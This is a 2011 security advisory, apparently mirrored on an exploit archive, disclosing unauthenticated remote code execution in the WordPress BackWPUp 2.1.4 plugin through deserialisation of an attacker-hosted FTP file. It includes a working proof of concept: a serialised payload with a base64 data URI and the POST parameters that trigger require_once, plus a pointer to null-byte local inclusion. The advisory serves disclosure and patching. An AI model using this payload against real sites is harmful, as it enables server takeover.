WordPress BackWPUp Plugin 2.1.4 Code Execution

2011-10-16T00:00:00
ID 1337DAY-ID-17001
Type zdt
Reporter Sense of Security
Modified 2011-10-16T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            Sense of Security - Security Advisory - SOS-11-012
 
Release Date.              17-Oct-2011
Vendor Notification Date.  14-Oct-2011
Product.                   BackWPUp
Platform.                  WordPress
Affected versions.         2.1.4
Severity Rating.           High
Impact.                    System access
Attack Vector.             Remote without authentication
Solution Status.           Upgrade to 2.1.5
CVE reference.             Not yet assigned
 
Details.
========
 
A vulnerability has been discovered in the WordPress plugin BackWPup
2.1.4 which can be exploited to execute local or remote code on the
web server.
 
There is a lack of data validation on the BackWPUpJobTemp POST
parameter of job/wp_export_generate.php allowing an attacker to
specify FTP resources as input.
 
This resource is downloaded and deserialised by the wp_export_generate.php
script and variables from this deserialisation are later passed to
require_once.
 
Proof of Concept.
=================
 
Upload the following to a publicly accessible FTP server and
name it "file.txt.running".
 
a:2:{s:7:"WORKING";a:1:{s:5:"NONCE";s:3:"123";}s:8:"ABS_PATH";s:25:
"data://text/plain;base64,PD8gcGhwaW5mbygpOyBkaWUoKTs=";}
 
This serialised string creates an array containing:
 
$infile['WORKING'] = array();
$infile['WORKING']['NONCE'] = '123';
$infile['ABS_PATH'] =
'data://text/plain;base64,PD8gcGhwaW5mbygpOyBkaWUoKTs=';
 
Once uploaded ensure the FTP file is writeable and issue a POST to
"job/wp_export_generate.php" with the following parameters:
 
$_POST['BackWPupJobTemp'] = "ftp://user:[email protected]/file.txt";
$_POST['nonce'] = '123';
$_POST['type'] = 'getxmlexport';
 
The string included in $infile['ABS_PATH'] will then have "wp-load.php"
appended to it and passed to require_once.
 
In the above example the code contained in the base64 encoded string will
then be executed. The above code executes .phpinfo(); die();..
allow_URL_include will need to be on to allow to allow for remote file
inclusion, however local file inclusion could easily be achieved by using
null byte injection.
 
Solution.
=========
Upgrade to BackWPUp 2.1.5 of above.
 
Discovered by.
Phil Taylor from Sense of Security Labs.



#  0day.today [2018-03-28]  #